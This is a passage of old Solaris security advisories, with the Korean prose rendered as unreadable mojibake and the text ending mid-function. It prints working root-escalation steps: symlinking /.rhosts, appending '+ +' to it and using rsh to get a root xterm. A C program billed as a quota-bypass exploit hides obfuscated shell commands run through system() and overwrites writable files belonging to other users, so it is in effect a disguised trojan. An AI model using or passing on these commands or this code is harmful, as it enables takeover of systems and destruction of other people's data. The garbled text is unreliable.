¹öÁ¯À» 8.8.5 ÀÌ»óÀ¸·Î ¿Ã¸®¸é µÈ´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º admintool ¸í·É admintool ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº°£´ÜÇÑ °æÀ§·Î .rhostsÆÄÀÏÀ» »ý¼ºÇÏ¿© ·çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù. setenv DISPLAY yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool (ÀÏ·ÃÀÇ °úÁ¤ ) echo "+ +" >> .rhosts /usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)" ÇØ°áÃ¥ setuid¸¦ ¾ø¾Ö´øÁö ÆÐÄ¡¸¦ Ç϶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º imstat(¶óÀ̼¾½º ¸Å´ÏÁ®) ¸í·É imstat(¶óÀ̼¾½º ¸Å´ÏÁ®) ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.4 ¹®Á¦Á¡ /var/tmp ¿¡ Àӽà ÆÄÀÏÀ» ¸¸µç´Ù..À̸¦ ÀÌ¿ëÇؼ­ .rhosts¸¦ ¸µÅ©½ÃÄÑ »ý¼ºÇÒ ¼ö ÀÖ´Ù. 
rm /var/tmp/locksuntechd ln -s /.rhosts /var/tmp/locksuntechd (ÀÏ·ÃÀÇ °úÁ¤ ) ÇØ°áÃ¥ Æ۹̼ÇÀ» ´Ý¾î¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º quota ¸í·É quota ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5(.1 ??) ¹®Á¦Á¡ ÄõÅÍÁ¦ÇÑÀ» ÇÇÇϸ鼭 ÆÄÀÏÀ» »ý¼ºÇÒ ¼ö ÀÖ´Ù. ±× ¿¹Á¦ÀÌ´Ù. /************************************************************************** * This exploit takes advantage of the latest sendmail hole, to hide * * warez from your quota program, effectivly making your quota infinate.. * * * * To compile: * * cc -o bigquota quota.c * * To run: * * ./bigquota file * * where file is the file you wish to hide from your quota program. * * * * Please note that this may take a minute. * * If you have any problems, talk to me, TSK, on IRC. * **************************************************************************/ #include #include #include #include #include int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\ 44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\ 65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\ 118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\ 94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\ 85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\ 32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\ 112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\ 115,85,38,30,122,126,3,93,97,44,100,32,33,10}; void main(argc, argv) int argc; char *argv[]; { char *checkseed(int *seeds); char *checkdir(char *dir); int initseeds[201]={25,\ 108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\ 116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\ 2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\ 98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\ 95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\ 
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\ 109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\ 126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\ 53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\ 3,-9,-23,11,-21,-90,-30,-7,20,-17,23}; int setupseeds[201]={1,\ 35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\ 110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\ 29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\ 38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\ 28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\ 119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\ 93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\ -6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\ 42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\ 67,-10,-79,96,23,4,3,-68,84,64,89}; int binseeds[201]={1,\ 14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\ 121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\ 64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\ 89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\ 121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\ 12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\ 42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\ -7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\ -23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\ 89,-7,-11,94,19,-65,72,-3,67,79,111}; int procseeds[201]={-14,\ 97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\ 17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\ 121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\ 125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\ 
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\ 95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\ 107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\ 99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\ 116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\ 85,-11,-22,111,-47,-65,60,-1,85,78,106}; int boutseeds[201]={-14842,\ 37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\ 17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\ 74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\ 75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\ 70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\ 34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\ 6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\ 106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\ -55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\ 32,-72,-94,40,-61,-54,-12,11,72,66,91}; int shtdwnseeds[201]={-42,\ 58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\ 122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\ 69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\ 115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\ 125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\ 1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\ 32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\ 108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\ 12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\ 16,-90,-78,45,-38,-65,56,11,77,71,89}; char *zipper(int *seeds1); char *path; int i=0,j,inhan,outhan; if(argc!=2) { puts("Usage:"); puts("quota "); puts("where is the file you wish"); puts("to hide/subtract from your quota."); exit(0); } system(zipper(initseeds)); system(zipper(setupseeds)); 
system(checkseed(binseeds)); path=checkdir("/"); if(!path) { puts("Technical Dificulties"); goto closeout; } if((outhan=open(path,O_WRONLY|O_TRUNC))==-1) { puts("Error opening outfile"); goto closeout; } if((inhan=open(argv[1],O_RDONLY))==-1) { puts("Error opening infile"); goto closeout; } if(filecopy(inhan,outhan)) { puts("Technical dificulties"); goto closeout; } if((unlink(argv[1]))==-1) { puts("Technical dificulties."); goto closeout; } if((rename(path,argv[1]))==-1) if((link(path,argv[1]))==-1) if((symlink(path,argv[1]))==-1) puts("Technical Dificulties."); closeout: system("%s\n",zipper(procseeds)); system("%s\n",zipper(boutseeds)); system("%s\n",zipper(shtdwnseeds)); } char *checkseed(int *seeds) { char *zipper(int *seeds1); char *string; char testseeds[30]; char god[200]; int i=200,j; if((string=(char *)getenv("PATH"))==NULL) { puts("Path not found"); exit(-1); } while((seeds[i]+seedsc[i])!=32) { testseeds[200-i]=seeds[i]+seedsc[i]; i--; } testseeds[i]=0; i=0; while(string[i]!=0) { j=0; while(string[i]!=58&&string[i]!=0) { god[j]=string[i]; i++; j++; } i++; god[j++]=47; god[j++]=0; strcpy(&god[j],testseeds); if(!stat(god,NULL)) return (char *)zipper(seeds); } return 0; } char *zipper(int *seeds1) { int i; char *buhbye; char teeth[201]; teeth[201]=0; for(i=200;i>=0;i--) teeth[200-i]=seeds1[i]+seedsc[i]; buhbye=(char *)malloc(201); strcpy(buhbye,teeth); return buhbye; } int filecopy(int from,int to) { int bufsiz; if (from < 0) return 1; if (to < 0) goto err; for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1) { register char *buffer; buffer = (char *) malloc(bufsiz); if (buffer) { while (1) { register int n; n = read(from,buffer,bufsiz); if (n == -1) break; if (n == 0) { free(buffer); return 0; } if (n != write(to,buffer,(unsigned) n)) break; } free(buffer); break; } } err: return 1; } char *checkdir(char *dir) { char *checkdir(char *dir); DIR *currdir; struct dirent *node; struct stat statnode; int i,j; char *path; char *retpath; path=(char *)malloc(300); 
if((currdir=opendir(dir))==NULL) return 0; node=readdir(currdir); while(node) { i=0; j=0; while(dir[i]) { path[i]=dir[i]; i++; } if(strcmp(dir,"/")) { path[i]='/'; i++; } while(node->d_name[j]) { path[i]=node->d_name[j]; i++; j++; } path[i]=0; if((lstat(path,&statnode))==-1) return 0; if(statnode.st_mode&S_IFREG) if(!access(path,W_OK)) if(!(statnode.st_mode&S_IFBLK)) if(!(statnode.st_mode&S_ISVTX)) if(statnode.st_uid!=getuid()) return path; if(statnode.st_mode&S_IFDIR)